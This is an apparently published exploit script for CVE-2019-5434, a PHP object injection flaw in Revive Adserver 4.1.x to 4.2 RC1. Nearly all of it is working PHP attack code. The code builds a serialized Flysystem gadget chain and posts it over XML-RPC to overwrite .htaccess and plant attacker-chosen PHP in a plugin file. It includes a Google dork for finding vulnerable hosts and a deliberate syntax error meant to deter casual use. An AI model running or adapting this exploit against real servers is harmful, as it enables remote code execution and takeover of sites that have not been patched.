Share
# Exploit Title: Revive Adserver 4.2 - Remote Code Execution  
# Google Dork: "inurl:www/delivery filetype:php"  
# Exploit Author: crlf  
# Vendor Homepage: https://www.revive-adserver.com/  
# Software Link: https://www.revive-adserver.com/download/archive/  
# Version: 4.1.x <= 4.2 RC1  
# Tested on: *nix  
# CVE : CVE-2019-5434  
# Сontains syntax error for protection against skids  
  
  
<?php  
# Revive Adserver 4.1.x <= 4.2 RC1 PHP Object Injection to Remote Code Execution (CVE-2019-5434)  
# coded by @crlf, with love for antichat.com  
# special thanks to @Kaimi :)  
# the script should be used only for educational purposes!  
  
namespace{  
(!isset($argv[2]) ? exit(message('php '.basename(__FILE__).' https://example.com/adserver-dir/ \'<?php phpinfo(); ?>\'')) : @list($x, $url, $code) = $argv);  
  
$source = 'data:text/html;base64,'.base64_encode('#');  
$destination = 'plugins/.htaccess';  
#$destination = 'var/.htaccess';  
  
if(!strpos(request($url, $source, $destination), 'methodResponse')) exit(message('failed, no valid response from '.$url));  
  
$source = 'data:text/html;base64,'.base64_encode($code);  
$destination = 'plugins/3rdPartyServers/ox3rdPartyServers/doubleclick.class.php';  
#$destination = 'var/default.conf.php';  
  
request($url, $source, $destination);  
message('check '.$url.$destination);  
  
function request($url, $source, $destination){  
  
$what = serialize(  
['what' =>  
new Pdp\Uri\Url(  
new League\Flysystem\File( $destination,  
new League\Flysystem\File( 'x://'.$source,  
new League\Flysystem\MountManager(  
new League\Flysystem\Filesystem(  
new League\Flysystem\Config,  
new League\Flysystem\Adapter\Local('')  
),  
new League\Flysystem\Plugin\ForcedCopy  
)  
)  
)  
)  
]  
);  
  
$what = str_replace(['\Uri\Url\00'],['\5CUri\5CUrl\00'], str_replace(['s:', сhr(0)],['S:', '\\00'], $what));  
  
$xml = '<?xml version="1.0" encoding="ISO-8859-1"?>  
<methodCall>  
<methodName>openads.spc</methodName>  
<params>  
<param>  
<value>  
<struct>  
<member>  
<name>remote_addr</name>  
<value>8.8.8.8</value>  
</member>  
<member>  
<name>cookies</name>  
<value>  
<array>  
</array>  
</value>  
</member>  
</struct>  
</value>  
</param>  
<param><value><string>'.$what.'</string></value></param>  
<param><value><string>0</string></value></param>  
<param><value><string>dsad</string></value></param>  
<param><value><boolean>1</boolean></value></param>  
<param><value><boolean>0</boolean></value></param>  
<param><value><boolean>1</boolean></value></param>  
</params>  
</methodCall>';  
  
return file_get_contents($url.'adxmlrpc.php', false, stream_context_create(  
['http' =>  
['method' => 'POST',  
'user_agent' => 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0',  
'header' =>'Content-type: application/x-www-form-urlencoded',  
'content'=> $xml  
]  
])  
);  
}  
  
function message($str){  
print PHP_EOL.'### '.$str.' ###'.PHP_EOL.PHP_EOL;  
}  
}  
  
namespace League\Flysystem\Plugin{  
class ForcedCopy{}  
}  
  
namespace League\Flysystem{  
class Config{  
protected $settings = [];  
public function __construct(){  
$this->settings = ['disable_asserts' => true];  
}  
}  
class Filesystem{  
protected $adapter;  
protected $config;  
public function __construct($config,$adapter){  
$this->config = $config;  
$this->adapter = $adapter;  
}  
}  
class MountManager{  
protected $filesystems = [];  
protected $plugins = [];  
public function __construct($filesystem, $handler){  
$this->filesystems = ['x' => $filesystem];  
$this->plugins = ['__toString' => $handler];  
}  
}  
class File{  
protected $path;  
protected $filesystem;  
public function __construct($path, $obj){  
$this->filesystem = $obj;  
$this->path = $path;  
}  
}  
}  
  
namespace League\Flysystem\Adapter{  
class Local{  
protected $pathPrefix;  
public function __construct($prefix){  
$this->pathPrefix = $prefix;  
}  
}  
}  
  
namespace Pdp\Uri{  
class Url{  
private $host;  
public function __construct($file){  
$this->host = $file;  
}  
}  
}